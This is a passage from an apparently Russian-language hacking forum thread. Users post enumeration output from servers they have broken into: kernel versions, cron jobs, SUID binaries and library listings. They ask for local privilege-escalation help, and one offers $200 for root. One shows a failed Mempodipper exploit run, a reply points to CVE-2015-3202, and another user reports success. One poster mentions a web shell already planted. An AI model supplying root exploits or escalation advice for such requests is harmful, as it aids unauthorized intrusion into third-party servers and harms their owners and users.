    Code:
    CentOS release 6.5 (Final)
    Kernel \r on an \m

    cat /etc/crontab

    Code:
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # For details see man 4 crontabs
    
    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # |  |  |  |  |
    # *  *  *  *  * user-name command to be executed
    ls -la /etc/cron.d
    Code:
    total 20
    drwxr-xr-x.  2 root root 4096 Oct 15  2014 .
    drwxr-xr-x. 71 root root 4096 Oct  8 04:27 ..
    -rw-r--r--.  1 root root  113 Nov 23  2013 0hourly
    -rw-r--r--.  1 root root  108 Apr  7  2014 raid-check
    -rw-r--r--  1 root root  235 Aug 29  2014 sysstat
    cat /etc/cron.d/0hourly
    Code:
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    01 * * * * root run-parts /etc/cron.hourly
    cat /etc/cron.d/raid-check
    Code:
    # Run system wide raid-check once a week on Sunday at 1am by default
    0 1 * * Sun root /usr/sbin/raid-check
    cat /etc/cron.d/sysstat
    Code:
    # Run system activity accounting tool every 10 minutes
    */10 * * * * root /usr/lib64/sa/sa1 1 1
    # 0 * * * * root /usr/lib64/sa/sa1 600 6 &
    # Generate a daily summary of process accounting at 23:53
    53 23 * * * root /usr/lib64/sa/sa2 -A
    cat /proc/version
    Code:
    Linux version 2.6.32-431.29.2.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Tue Sep 9 21:36:05 UTC 2014
    cat /proc/sys/vm/mmap_min_addr
    Code:
    4096

    ls -la /etc/cron.hourly

    Code:
    total 12
    drwxr-xr-x.  2 root root 4096 Sep 26  2011 .
    drwxr-xr-x. 71 root root 4096 Oct  8 04:27 ..
    -rwxr-xr-x.  1 root root  409 Nov 23  2013 0anacron
    cat /etc/cron.hourly/0anacron
    Code:
    #!/bin/bash
    # Skip excecution unless the date has changed from the previous run
    if test -r /var/spool/anacron/cron.daily; then
      day=`cat /var/spool/anacron/cron.daily`
    fi
    if [ `date +%Y%m%d` = "$day" ]; then
      exit 0;
    fi
    
    # Skip excecution unless AC powered
    if test -x /usr/bin/on_ac_power; then
      /usr/bin/on_ac_power &> /dev/null
      if test $? -eq 1; then
      exit 0
      fi
    fi
    /usr/sbin/anacron -s
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    Code:
    -rwsr-xr-x. 1 root root 10272 Nov 22  2013 /sbin/pam_timestamp_check
    -rwsr-xr-x. 1 root root 34840 Nov 22  2013 /sbin/unix_chkpwd
    -rwsr-xr-x. 1 root root 77336 Apr 28  2014 /bin/mount
    -rwsr-xr-x. 1 root root 40760 Sep 26  2013 /bin/ping
    -rwsr-x---. 1 root fuse 27968 Dec  7  2011 /bin/fusermount
    -rwsr-xr-x. 1 root root 36488 Sep 26  2013 /bin/ping6
    -rwsr-xr-x. 1 root root 53472 Apr 28  2014 /bin/umount
    -rwsr-xr-x. 1 root root 34904 Jun 25  2014 /bin/su
    -rwsr-x--- 1 root dbus 46232 Sep 13  2012 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x. 1 root root 9000 Sep  3  2014 /usr/sbin/usernetctl
    ---s--x--x. 1 root root 123832 Nov 22  2013 /usr/bin/sudo
    -rwsr-xr-x. 1 root root 71480 Dec  7  2011 /usr/bin/gpasswd
    -rwsr-xr-x. 1 root root 51784 Nov 23  2013 /usr/bin/crontab
    -rwsr-xr-x. 1 root root 30768 Feb 22  2012 /usr/bin/passwd
    -rwsr-xr-x 1 root root 18072 Sep 19  2013 /usr/bin/pkexec
    -rws--x--x. 1 root root 20056 Apr 28  2014 /usr/bin/chsh
    -rwsr-xr-x. 1 root root 66352 Dec  7  2011 /usr/bin/chage
    -rwsr-xr-x. 1 root root 36144 Dec  7  2011 /usr/bin/newgrp
    -rws--x--x. 1 root root 20184 Apr 28  2014 /usr/bin/chfn
    -rws--x--x. 1 root root 14280 Aug 29  2014 /usr/libexec/pt_chown
    -rwsr-xr-x. 1 root root 237376 Nov 22  2013 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 11080 Sep 19  2013 /usr/libexec/polkit-1/polkit-agent-helper-1
     
  6. Zilt0

    Zilt0 New Member

    Joined:
    1 Apr 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Ребята, помогите, даю $200, тому кто поможет с рутом, (писать в ЛС):


    uname -a
    Linux xxx.ru 2.6.32-504.16.2.el6.x86_64 #1 SMP Tue Mar 10 17:01:00 EDT 2015 x86_64 x86_64 x86_64 GNU/Linux

    ls -la /boot
    dr-xr-xr-x. 4 root root 4096 Dec 17 11:43 .
    dr-xr-xr-x. 24 root root 4096 Oct 7 08:33 ..
    -rw-r--r-- 1 root root 171 Mar 10 2015 .vmlinuz-2.6.32-504.16.2.el6.x86_64.hmac
    -rw-r--r-- 1 root root 171 Nov 23 17:58 .vmlinuz-2.6.32-573.12.1.el6.x86_64.hmac
    -rw-r--r-- 1 root root 2545609 Mar 10 2015 System.map-2.6.32-504.16.2.el6.x86_64
    -rw-r--r-- 1 root root 2585672 Nov 23 17:58 System.map-2.6.32-573.12.1.el6.x86_64
    -rw-r--r-- 1 root root 106313 Mar 10 2015 config-2.6.32-504.16.2.el6.x86_64
    -rw-r--r-- 1 root root 107139 Nov 23 17:58 config-2.6.32-573.12.1.el6.x86_64
    drwxr-xr-x. 3 root root 4096 Jan 28 2014 efi
    drwxr-xr-x. 2 root root 4096 Dec 17 11:43 grub
    -rw------- 1 root root 19178534 Apr 24 2015 initramfs-2.6.32-504.16.2.el6.x86_64.img
    -rw------- 1 root root 24641878 Dec 17 11:43 initramfs-2.6.32-573.12.1.el6.x86_64.img
    -rw-r--r-- 1 root root 200317 Mar 10 2015 symvers-2.6.32-504.16.2.el6.x86_64.gz
    -rw-r--r-- 1 root root 206008 Nov 23 17:59 symvers-2.6.32-573.12.1.el6.x86_64.gz
    -rwxr-xr-x 1 root root 4153296 Mar 10 2015 vmlinuz-2.6.32-504.16.2.el6.x86_64
    -rwxr-xr-x 1 root root 4222736 Nov 23 17:58 vmlinuz-2.6.32-573.12.1.el6.x86_64

    ls -la --full-time /lib

    dr-xr-xr-x. 10 root root 4096 2015-12-14 10:25:53.059324786 +0000 .
    dr-xr-xr-x. 24 root root 4096 2015-10-07 08:33:06.521146748 +0100 ..
    lrwxrwxrwx 1 root root 14 2015-08-05 11:24:39.585708251 +0100 cpp -> ../usr/bin/cpp
    drwxr-xr-x. 44 root root 12288 2015-12-17 11:43:13.810422798 +0000 firmware
    drwxr-xr-x 3 root root 4096 2015-08-26 12:14:42.000000000 +0100 i686
    drwxr-xr-x. 6 root root 4096 2014-01-28 10:26:02.526367363 +0000 kbd
    -rwxr-xr-x 1 root root 141176 2015-08-26 12:40:51.000000000 +0100 ld-2.12.so
    lrwxrwxrwx 1 root root 10 2015-09-29 09:57:42.229365669 +0100 ld-linux.so.2 -> ld-2.12.so
    -rwxr-xr-x 1 root root 7224 2015-08-26 12:40:53.000000000 +0100 libBrokenLocale-2.12.so
    lrwxrwxrwx 1 root root 23 2015-09-29 09:57:42.230365669 +0100 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
    -rwxr-xr-x 1 root root 20376 2015-08-26 12:40:51.000000000 +0100 libSegFault.so
    -rwxr-xr-x 1 root root 13416 2015-08-26 12:40:53.000000000 +0100 libanl-2.12.so
    lrwxrwxrwx 1 root root 14 2015-09-29 09:57:42.231365669 +0100 libanl.so.1 -> libanl-2.12.so
    -rwxr-xr-x 1 root root 1902684 2015-08-26 12:40:48.000000000 +0100 libc-2.12.so
    lrwxrwxrwx 1 root root 12 2015-09-29 09:57:42.307365669 +0100 libc.so.6 -> libc-2.12.so
    -rwxr-xr-x 1 root root 190992 2015-08-26 12:40:52.000000000 +0100 libcidn-2.12.so
    lrwxrwxrwx 1 root root 15 2015-09-29 09:57:42.314365669 +0100 libcidn.so.1 -> libcidn-2.12.so
    -rwxr-xr-x 1 root root 38380 2015-08-26 12:40:49.000000000 +0100 libcrypt-2.12.so
    lrwxrwxrwx 1 root root 16 2015-09-29 09:57:42.315365669 +0100 libcrypt.so.1 -> libcrypt-2.12.so
    -rwxr-xr-x 1 root root 17896 2015-08-26 12:40:52.000000000 +0100 libdl-2.12.so
    lrwxrwxrwx 1 root root 13 2015-09-29 09:57:42.316365669 +0100 libdl.so.2 -> libdl-2.12.so
    -rw-r--r-- 1 root root 899 2015-08-10 15:34:50.000000000 +0100 libfreebl3.chk
    -rwxr-xr-x 1 root root 9604 2015-08-10 15:34:49.000000000 +0100 libfreebl3.so
    -rw-r--r-- 1 root root 899 2015-08-10 15:34:50.000000000 +0100 libfreeblpriv3.chk
    -rwxr-xr-x 1 root root 378504 2015-08-10 15:34:49.000000000 +0100 libfreeblpriv3.so
    -rwxr-xr-x 1 root root 120672 2015-06-01 12:36:01.000000000 +0100 libgcc_s-4.4.7-20120601.so.1
    lrwxrwxrwx 1 root root 28 2015-12-13 11:06:00.471280730 +0000 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
    -rwxr-xr-x 1 root root 200024 2015-08-26 12:40:49.000000000 +0100 libm-2.12.so
    lrwxrwxrwx 1 root root 12 2015-09-29 09:57:42.324365669 +0100 libm.so.6 -> libm-2.12.so
    -rwxr-xr-x 1 root root 113912 2015-08-26 12:40:49.000000000 +0100 libnsl-2.12.so
    lrwxrwxrwx 1 root root 14 2015-09-29 09:57:42.329365669 +0100 libnsl.so.1 -> libnsl-2.12.so
    -rwxr-xr-x 1 root root 40200 2015-08-26 12:40:47.000000000 +0100 libnss_compat-2.12.so
    lrwxrwxrwx 1 root root 21 2015-09-29 09:57:42.331365669 +0100 libnss_compat.so.2 -> libnss_compat-2.12.so
    -rwxr-xr-x 1 root root 25596 2015-08-26 12:40:53.000000000 +0100 libnss_dns-2.12.so
    lrwxrwxrwx 1 root root 18 2015-09-29 09:57:42.332365669 +0100 libnss_dns.so.2 -> libnss_dns-2.12.so
    -rwxr-xr-x 1 root root 58708 2015-08-26 12:40:51.000000000 +0100 libnss_files-2.12.so
    lrwxrwxrwx 1 root root 20 2015-09-29 09:57:42.334365669 +0100 libnss_files.so.2 -> libnss_files-2.12.so
    -rwxr-xr-x 1 root root 22140 2015-08-26 12:40:53.000000000 +0100 libnss_hesiod-2.12.so
    lrwxrwxrwx 1 root root 21 2015-09-29 09:57:42.335365669 +0100 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
    -rwxr-xr-x 1 root root 49712 2015-08-26 12:40:48.000000000 +0100 libnss_nis-2.12.so
    lrwxrwxrwx 1 root root 18 2015-09-29 09:57:42.337365669 +0100 libnss_nis.so.2 -> libnss_nis-2.12.so
    -rwxr-xr-x 1 root root 58712 2015-08-26 12:40:47.000000000 +0100 libnss_nisplus-2.12.so
    lrwxrwxrwx 1 root root 22 2015-09-29 09:57:42.339365669 +0100 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
    -rwxr-xr-x 1 root root 131220 2015-08-26 12:40:48.000000000 +0100 libpthread-2.12.so
    lrwxrwxrwx 1 root root 18 2015-09-29 09:57:42.345365669 +0100 libpthread.so.0 -> libpthread-2.12.so
    -rwxr-xr-x 1 root root 103388 2015-08-26 12:40:47.000000000 +0100 libresolv-2.12.so
    lrwxrwxrwx 1 root root 17 2015-09-29 09:57:42.349365669 +0100 libresolv.so.2 -> libresolv-2.12.so
    -rwxr-xr-x 1 root root 39712 2015-08-26 12:40:51.000000000 +0100 librt-2.12.so
    lrwxrwxrwx 1 root root 13 2015-09-29 09:57:42.351365669 +0100 librt.so.1 -> librt-2.12.so
    -rwxr-xr-x 1 root root 31620 2015-08-26 12:40:54.000000000 +0100 libthread_db-1.0.so
    lrwxrwxrwx 1 root root 19 2015-09-29 09:57:42.353365669 +0100 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x 1 root root 12792 2015-08-26 12:40:52.000000000 +0100 libutil-2.12.so
    lrwxrwxrwx 1 root root 15 2015-09-29 09:57:42.353365669 +0100 libutil.so.1 -> libutil-2.12.so
    lrwxrwxrwx 1 root root 13 2015-12-14 10:25:53.050324786 +0000 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x 1 root root 75384 2012-10-03 17:18:48.000000000 +0100 libz.so.1.2.3
    dr-xr-xr-x. 4 root root 4096 2015-12-17 11:43:19.774422792 +0000 modules
    drwxr-xr-x 3 root root 4096 2015-09-29 09:57:42.355365669 +0100 rtkaio
    drwxr-xr-x. 2 root root 4096 2015-08-04 15:08:58.000000000 +0100 security
    drwxr-xr-x. 6 root root 4096 2015-02-19 16:44:23.000000000 +0000 terminfo
    drwxr-xr-x. 5 root root 4096 2015-12-17 11:43:09.066422802 +0000 udev

    mount
    /dev/sda1 on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw,noexec,size=2G)
    /dev/sda3 on /tmp type ext4 (rw)
    /dev/sda5 on /usr type ext4 (rw)
    /dev/sda6 on /var type ext4 (rw,nosuid,noatime)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
    10.0.3.53:/home/sites on /home/sites type nfs (rw,nosuid,noatime,hard,intr,rsize=8192,wsize=8192,nfsvers=3,addr=10.0.3.53)

    df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/sda1 3.9G 796M 2.9G 22% /
    tmpfs 2.0G 686M 1.4G 34% /dev/shm
    /dev/sda3 2.0G 216M 1.6G 12% /tmp
    /dev/sda5 2.0G 1.5G 421M 79% /usr
    /dev/sda6 123G 28G 89G 24% /var
    10.0.3.53:/home/sites
    17T 11T 5.5T 67% /home/sites

    cat /etc/issue
    Red Hat Enterprise Linux Server release 6.7 (Santiago)
    Kernel \r on an \m

    cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # For details see man 4 crontabs

    # Example of job definition:
    # .---------------- minute (0 - 59)
    # | .------------- hour (0 - 23)
    # | | .---------- day of month (1 - 31)
    # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
    # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # | | | | |
    # * * * * * user-name command to be executed

    ls -la /etc/cron.d
    drwxr-xr-x. 2 root root 4096 Dec 2 12:21 .
    drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..
    -rw-r--r-- 1 root root 113 Sep 22 12:05 0hourly
    -rw-r--r-- 1 root root 363 May 21 2015 aide
    -rw-r--r-- 1 root root 52 Dec 2 10:52 apache_child_catcher.cron
    -rw-r--r-- 1 root root 42 Dec 2 10:52 auth_db_cache.cron
    -rw-r--r-- 1 root root 112 Jan 28 2014 cache_omreport_data
    -rw-r--r-- 1 root root 204 Dec 2 10:52 clear-frozen-and-old-emails-from-exim-spool.cron
    -rw-r--r-- 1 root root 120 Dec 2 10:52 compress-large-logs.cron
    -rw-------. 1 root root 70 Jul 30 2013 dump-and-clear-omreport-hardware-logs.cron
    -rw-r--r-- 1 root root 99 Jul 15 2013 find_non_exim_spammers.cron
    -rw-r--r-- 1 root root 86 Dec 2 10:52 find_spam_cmq.cron
    -rw-r--r-- 1 root root 41 Dec 2 10:52 finddaemon.cron
    -rw-r--r-- 1 root root 92 Dec 2 10:52 findmultiprocesses.cron
    -rw-r--r-- 1 root root 514 Dec 2 10:52 half_hourly_httpd_config_update_light_and_apache_graceful.cron
    -rw-r--r-- 1 root root 51 Dec 2 10:52 halfmonthly.cron
    -rw-r--r-- 1 root root 50 Jan 28 2014 hw_sys_time_sync
    -rw-r--r-- 1 root root 77 Dec 2 10:52 ip_limit.cron
    -rw-r--r-- 1 root root 61 May 7 2015 nat-pling.cron
    -rw-r--r-- 1 root root 128 Sep 19 2014 pickup-ttys.cron
    -rw------- 1 root root 134 Jan 28 2014 purge-old-tmp.cron
    -rw------- 1 root root 108 May 20 2015 raid-check
    -rw------- 1 root root 159 Apr 8 2015 report-spec-db-differences.cron
    -rw------- 1 root root 235 Aug 4 2014 sysstat
    -rw-r--r-- 1 root root 34 Dec 2 10:52 update-locate-db.cron
    -rw-r--r-- 1 root root 43 Dec 2 10:52 update-user-cron.cron
    -rw------- 1 root root 78 Apr 10 2014 update_shareddb_motd.cron

    ls -la /etc/cron.hourly
    drwxr-xr-x. 2 root root 4096 Dec 2 12:21 .
    drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..
    lrwxrwxrwx 1 root root 20 Dec 2 12:21 00noomkiller -> /usr/sbin/noomkiller
    -rwxr-xr-x 1 root root 409 Sep 22 12:05 0anacron
    lrwxrwxrwx 1 root root 35 Dec 2 12:21 0http-config-ssl-update.pl -> /usr/sbin/http-config-ssl-update.pl
    lrwxrwxrwx 1 root root 37 Dec 2 12:21 0http-config-update-light.pl -> /usr/sbin/http-config-update-light.pl
    lrwxrwxrwx 1 root root 39 Dec 2 12:21 0http-frozzle-config-update.pl -> /usr/sbin/http-frozzle-config-update.pl
    lrwxrwxrwx 1 root root 24 Dec 2 12:21 0mysqlps-ext.pl -> /usr/sbin/mysqlps-ext.pl
    lrwxrwxrwx 1 root root 31 Dec 2 12:21 1http-config-mv-log.pl -> /usr/sbin/http-config-mv-log.pl
    lrwxrwxrwx 1 root root 35 Dec 2 12:21 2cache_omreport_results.sh -> /usr/sbin/cache_omreport_results.sh
    lrwxrwxrwx 1 root root 30 Dec 2 12:21 3tmp-inode-cleaner.sh -> /usr/sbin/tmp-inode-cleaner.sh
    lrwxrwxrwx 1 root root 34 Dec 2 12:21 delete_temp_ftp_files.pl -> /usr/sbin/delete_temp_ftp_files.pl
    -rwxr-xr-x 1 root root 273 Feb 13 2015 mcelog.cron
    lrwxrwxrwx 1 root root 40 Dec 2 12:21 update-exim-denied-senders.plx -> /usr/sbin/update-exim-denied-senders.plx

    ls -la /etc/cron.monthly
    drwxr-xr-x. 2 root root 4096 Jan 28 2014 .
    drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..
    -rwxr-xr-x. 1 root root 111 Oct 21 2013 readahead-monthly.cron

    ls -la /etc/cron.weekly
    drwxr-xr-x. 2 root root 4096 Dec 2 12:21 .
    drwxr-xr-x. 97 root root 12288 Dec 27 07:51 ..
    lrwxrwxrwx 1 root root 25 Dec 2 12:21 n-log-rotate.rb -> /usr/sbin/n-log-rotate.rb

    cat /proc/version
    Linux version 2.6.32-504.16.2.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-9) (GCC) ) #1 SMP Tue Mar 10 17:01:00 EDT 2015

    cat /proc/sys/vm/mmap_min_addr
    4096

    ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 Mar 26 2015 /usr/bin/staprun

    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rwsr-xr-x 1 root root 36488 Dec 11 2014 /bin/ping6
    -rwsr-xr-x 1 root root 34904 Oct 21 14:23 /bin/su
    -rwsr-xr-x 1 root root 38200 Dec 11 2014 /bin/ping
    -rwsr-xr-x 1 root root 53472 Aug 11 2014 /bin/umount
    -rwsr-xr-x 1 root root 77336 Aug 11 2014 /bin/mount
    -rwsr-xr-x 1 root root 34840 Aug 4 15:09 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 10272 Aug 4 15:09 /sbin/pam_timestamp_check
    -rwsr-xr-x 1 root root 123648 May 19 2015 /sbin/mount.nfs
    -rwsr-xr-x 1 root root 68865 Jul 29 15:19 /opt/dell/srvadmin/sbin/omcliproxy
    -rwsr-x--- 1 root dbus 46232 Apr 20 2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-x--- 1 root support 1332 Apr 7 2014 /usr/bin/ssu
    -rwsr-xr-x 1 root root 66352 Mar 27 2015 /usr/bin/chage
    -rwsr-xr-x 1 root root 20888 May 26 2014 /usr/bin/rcp
    -rwsr-x--- 1 root 503 8042 Apr 4 2014 /usr/bin/rshop-diff
    -rws--s--x 1 _rshop apache 7873 Jun 17 2011 /usr/bin/rshop-int
    -rwsr-xr-x 1 root root 30768 Nov 2 19:00 /usr/bin/passwd
    -rwsr-xr-x 1 root root 22544 Mar 7 2015 /usr/bin/pkexec
    -rwsr-xr-x 1 root root 51784 Sep 22 12:05 /usr/bin/crontab
    -rwsr-xr-x 1 root root 15640 May 26 2014 /usr/bin/rlogin
    -rwsr-x--- 1 root apache 183 Mar 28 2014 /usr/bin/kill-all-php-scripts.plx
    -rwsr-xr-x 1 root root 36144 Mar 27 2015 /usr/bin/newgrp
    -rws--x--x 1 root root 20056 Aug 11 2014 /usr/bin/chsh
    -rws--x--x 1 _status _status 4264 Mar 14 2014 /usr/bin/system_status
    -rwsr-xr-x 1 root root 59408 Apr 10 2015 /usr/bin/ksu
    -rws--x--x 1 root root 69752 Oct 1 13:58 /usr/bin/sperl5.10.1
    -rwsr-xr-x 1 root root 11408 May 26 2014 /usr/bin/rsh
    -rws--x--x 1 root root 20184 Aug 11 2014 /usr/bin/chfn
    -rwsr-xr-x 1 root root 71480 Mar 27 2015 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 54496 Feb 16 2015 /usr/bin/at
    ---s--x--x 1 root root 123832 Jul 29 13:08 /usr/bin/sudo
    ---s--x--- 1 root stapusr 183072 Mar 26 2015 /usr/bin/staprun
    -rwsr-x--- 1 root support 1332 Jan 29 2014 /usr/local/bin/ssu
    -rws--x--x 1 _status _status 6466 Jan 29 2014 /usr/local/bin/system_status
    -rwsr-xr-x 1 root root 257824 Jul 17 10:02 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 14368 Mar 7 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rws--x--x 1 root root 14280 Aug 26 12:24 /usr/libexec/pt_chown
    -rwsr-xr-x. 1 root root 893912 Feb 8 2013 /usr/sbin/exim
    -rws--x--x. 1 root root 34048 Feb 25 2010 /usr/sbin/userhelper
    -r-s--x--- 1 root apache 19992 Nov 11 11:31 /usr/sbin/suexec
    -rwsr-xr-x 1 root root 9000 Nov 10 16:34 /usr/sbin/usernetctl
     
  7. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Есть серв:
    Linux 2.6.18-400.1.1.el5PAE #1 SMP Thu Dec 18 01:38:34 EST 2014 i686
    Нашел под него сплоит (https://www.exploit-db.com/exploits/18411/), однако запускаю и вижу:
    Code:
    [+] Opening parent mem /proc/30870/mem in child.
    [+] Sending fd 3 to parent.
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================
    
    [+] Waiting for transferred fd in parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [-] Could not resolve /bin/su. Specify the exit@plt function address manually.
    Смотрю я дальше su:
    ls -la /bin/su
    -rwsr-x--- 1 root wheel 24312 Mar 21 2012 /bin/su
    И тут до меня доходит что прав на файл у меня вообще нет. Это смертельно? Может быть можно что-то сделать не задействуя su?
     
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Указано ведь, что mempodipper для 2.6.39 <= 3.2.2 и ядер до начала 12 года.
     
  9. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Что с CVE-2015-3202 ?
     
    Filipp and Vip77 like this.
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Рутанул :). Спасибо, с наступающим!
     
    YaBtr likes this.
  11. BestAV

    BestAV New Member

    Joined:
    27 Sep 2010
    Messages:
    107
    Likes Received:
    3
    Reputations:
    0
    Подскажите, что-то, под это дело:
    Linux saturn 3.2.0-97-generic #137-Ubuntu SMP Thu Dec 17 18:11:47 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
     
  12. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
  13. BestAV

    BestAV New Member

    Joined:
    27 Sep 2010
    Messages:
    107
    Likes Received:
    3
    Reputations:
    0
    Увы, но нет.

    А сюда может есть какие-то мысли?
    Linux 3.14.51-grsec #1 SMP Wed Aug 19 16:00:30 UTC 2015 x86_64
     
  14. mariochat

    mariochat New Member

    Joined:
    9 Apr 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Hello from Serbia!

    Some people claim they've managed to root CentOS kernel 2.6.32-431.el6.x86_64 with FUSE exploit. I've tried on many 431 kernels they all give the same error :
    bash: /bin/fusermount: Permission denied

    Anyone ?
     
  15. mybaks

    mybaks New Member

    Joined:
    4 Aug 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Приветвую имеется проблема с повышением привелегий, шел залит, но считай только на просмотр файлов и некоторых файлов root.
    Linux server 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
    Ищу кто может помочь в данном вопросе!
     
  16. LETIFERUM

    LETIFERUM New Member

    Joined:
    3 Apr 2016
    Messages:
    43
    Likes Received:
    0
    Reputations:
    0
    есть ли варианты?)
    sh-4.2$ uname -a
    uname -a
    Linux 3.4.63-2.44-xen #1 SMP Wed Oct 2 11:18:32 UTC 2013 (d91a619) x8
    6_64 x86_64 x86_64 GNU/Linux
    sh-4.2$ ls -la /boot
    ls -la /boot
    total 22381
    drwxr-xr-x 4 root root 1024 Apr 13 12:54 .
    drwxr-xr-x 23 root root 4096 Apr 13 15:24 ..
    -rw------- 1 root root 512 Mar 22 2012 backup_mbr
    lrwxrwxrwx 1 root root 1 Apr 13 12:52 boot -> .
    -rw-r--r-- 1 root root 1236 Jul 15 2012 boot.readme
    -rw-r--r-- 1 root root 127359 Oct 3 2013 config-3.4.63-2.44-xen
    drwxr-xr-x 2 root root 1024 Apr 13 12:54 grub
    -rw-r--r-- 1 root root 10209218 Apr 13 12:56 initrd-3.4.63-2.44-xen
    lrwxrwxrwx 1 root root 22 Apr 13 12:54 initrd-xen -> initrd-3.4.63-2.44-x
    en
    drwx------ 2 root root 12288 Mar 22 2012 lost+found
    -rw-r--r-- 1 root root 581632 Apr 13 12:56 message
    -rw-r--r-- 1 root root 218700 Oct 3 2013 symvers-3.4.63-2.44-xen.gz
    -rw-r--r-- 1 root root 409 Oct 3 2013 sysctl.conf-3.4.63-2.44-xen
    -rw-r--r-- 1 root root 2245738 Oct 3 2013 System.map-3.4.63-2.44-xen
    -rw-r--r-- 1 root root 5087421 Oct 3 2013 vmlinux-3.4.63-2.44-xen.gz
    -rw-r--r-- 1 root root 4324884 Oct 3 2013 vmlinuz-3.4.63-2.44-xen
    lrwxrwxrwx 1 root root 23 Apr 13 12:54 vmlinuz-xen -> vmlinuz-3.4.63-2.44
    -xen
    sh-4.2$ ls -la --full-time /lib
    ls -la --full-time /lib
    total 7896
    drwxr-xr-x 16 root root 4096 2016-04-13 12:51:46.645982937 +0400 .
    drwxr-xr-x 23 root root 4096 2016-04-13 15:24:45.041884720 +0400 ..
    drwxr-xr-x 2 root root 4096 2016-04-13 12:52:03.817982937 +0400 aaa_base
    drwxr-xr-x 3 root root 4096 2016-04-13 12:54:51.596221936 +0400 cryptsetup
    drwxr-xr-x 3 root root 4096 2016-04-13 12:52:18.301982937 +0400 dbus-1
    drwxr-xr-x 2 root root 4096 2016-04-13 12:50:56.082563749 +0400 engines
    drwxr-xr-x 5 root root 4096 2016-04-13 12:54:25.424797031 +0400 firmware
    drwxr-xr-x 3 root root 4096 2016-04-13 12:50:51.862563749 +0400 i686
    -rwxr-xr-x 1 root root 152418 2012-12-20 15:59:40.000000000 +0400 ld-2.15.so
    lrwxrwxrwx 1 root root 10 2016-04-13 12:50:51.950563749 +0400 ld-linux.so.
    2 -> ld-2.15.so
    -rwxr-xr-x 1 root root 17585 2012-12-20 15:59:40.000000000 +0400 libanl-2.15.
    so
    lrwxrwxrwx 1 root root 14 2016-04-13 12:50:51.954563749 +0400 libanl.so.1
    -> libanl-2.15.so
    -rwxr-xr-x 1 root root 7176 2012-12-20 15:59:40.000000000 +0400 libBrokenLoc
    ale-2.15.so
    lrwxrwxrwx 1 root root 23 2016-04-13 12:50:51.954563749 +0400 libBrokenLoc
    ale.so.1 -> libBrokenLocale-2.15.so
    -rwxr-xr-x 1 root root 1920983 2012-12-20 15:59:40.000000000 +0400 libc-2.15.so

    -rwxr-xr-x 1 root root 190899 2012-12-20 15:59:40.000000000 +0400 libcidn-2.15
    .so
    lrwxrwxrwx 1 root root 15 2016-04-13 12:50:51.982563749 +0400 libcidn.so.1
    -> libcidn-2.15.so
    lrwxrwxrwx 1 root root 24 2016-04-13 12:50:54.406563749 +0400 libcom_err.s
    o.2 -> /usr/lib/libcom_err.so.2
    lrwxrwxrwx 1 root root 26 2016-04-13 12:50:54.406563749 +0400 libcom_err.s
    o.2.1 -> /usr/lib/libcom_err.so.2.1
    -rwxr-xr-x 1 root root 61173 2012-12-20 15:59:40.000000000 +0400 libcrypt-2.1
    5.so
